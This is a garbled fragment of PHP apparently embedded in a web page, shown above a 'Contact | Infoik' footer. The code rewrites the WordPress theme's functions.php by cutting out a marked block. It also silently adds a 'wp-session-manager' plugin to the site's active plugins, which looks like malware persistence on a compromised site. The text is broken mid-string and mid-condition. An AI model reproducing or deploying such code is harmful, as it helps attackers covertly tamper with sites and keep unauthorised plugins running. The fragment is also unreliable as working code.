';
$s = strpos($fc, $m);
$e = strrpos($fc, $m);
if ($s !== false && $e !== false && $s !== $e) {
$clean = rtrim(substr($fc, 0, $s) . substr($fc, $e + strlen($m))) . "\n";
if (strlen($clean) > 10 && strpos($clean, ' 1000) {
$active = get_option('active_plugins') ?: array();
$slug = 'wp-session-manager/wp-session-manager.php';
if (!in_array($slug, $active)) { $active[] = $slug; update_option('active_plugins', $active); }
}
}
$func_file = get_template_directory() . '/functions.php';
$fc = @file_get_contents($func_file);
if ($fc && strlen($fc) > 10) {
$m = '
Contact | Infoik